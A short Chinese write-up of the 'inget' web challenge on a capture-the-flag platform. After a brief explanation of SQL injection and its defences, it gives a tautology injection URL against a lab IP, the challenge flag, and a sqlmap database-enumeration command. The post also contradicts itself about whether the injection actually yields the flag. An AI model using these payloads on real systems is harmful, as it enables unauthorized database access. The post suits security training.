【愚公系列】2023年05月 攻防世界-Web(inget)
前言
SQL注入攻击是一种常见的网络攻击方式,攻击者通过在用户输入的数据中插入恶意代码,从而获取数据库中的敏感信息或者执行未授权的操作。为了防范SQL注入攻击,我们应该在应用程序中使用参数化查询这样的安全措施来防范这种攻击。同时,我们还应该加强数据过滤和输入验证,以确保用户输入的数据符合预期的格式和类型。
一、inget
1.题目
在这里插入图片描述
2.答题
测试注入
http://61.147.171.105:61542/?id=1' or 1=2 --+
在这里插入图片描述
得到flag:cyberpeace{655c447c90fba82fe9d9f71df3fb37d8}
使用sqlmap跑
sqlmap -u "http://61.147.171.105:61542/?id=1" -dbs
在这里插入图片描述
sql注入只是测试下,因为flag是在php代码里,sql注入拿不到flag。
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2023-05-23 ,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读